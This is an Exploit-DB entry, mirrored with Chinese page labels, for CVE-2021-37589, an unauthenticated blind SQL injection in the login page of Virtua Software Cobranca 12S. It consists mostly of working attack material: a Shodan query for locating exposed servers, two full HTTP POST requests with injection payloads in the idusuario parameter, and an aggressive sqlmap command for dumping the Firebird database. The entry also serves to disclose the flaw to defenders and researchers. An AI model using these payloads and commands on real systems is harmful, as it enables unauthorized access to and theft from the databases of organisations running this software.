Virtua Software Cobranca 12S – SQLi

  • 作者: Luca Regne
    日期: 2022-06-14
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50958/
  • # Exploit Title: Virtua Software Cobranca 12S - SQLi
    # Shodan Query: http.favicon.hash:876876147
    # Date: 13/08/2021
    # Exploit Author: Luca Regne
    # Vendor Homepage: https://www.virtuasoftware.com.br/
    # Software Link: https://www.virtuasoftware.com.br/downloads/Cobranca12S_13_08.exe
    # Version: 12S
    # Tested on: Windows Server 2019
    # CVE : CVE-2021-37589
    ------------------------------------------------------------------------
    
    
    ## Description 
    A Blind SQL injection vulnerability in a Login Page (/controller/login.php) in Virtua Cobranca 12S version allows remote unauthenticated attackers to get information about application executing arbitrary SQL commands by idusuario parameter. 
    
    ## Request PoC
    ```
    POST /controller/login.php?acao=autenticar HTTP/1.1
    Host: redacted.com
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 37
    Connection: close
    Cookie: origem_selecionado=; PHPSESSID=
    
    idusuario='&idsenha=awesome_and_unprobaly_password&tipousr=Usuario
    
    ```
    
    This request causes an error 500. Changing the idusuario to "'+AND+'1'%3d'1'--" the response to request was 200 status code with message of authentication error. 
    
    ```
    POST /controller/login.php?acao=autenticar HTTP/1.1
    Host: redacted.com
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 37
    Connection: close
    Cookie: origem_selecionado=; PHPSESSID=
    
    idusuario='+AND+'1'='1'--&idsenha=a&tipousr=Usuario
    
    ```
    
    ## Exploit
    Save the request from burp to file 
    ```bash
    python3 sqlmap.py -r ~/req-virtua.txt -p idusuario --dbms firebird --level 5 --risk 3 --random-agent
    ```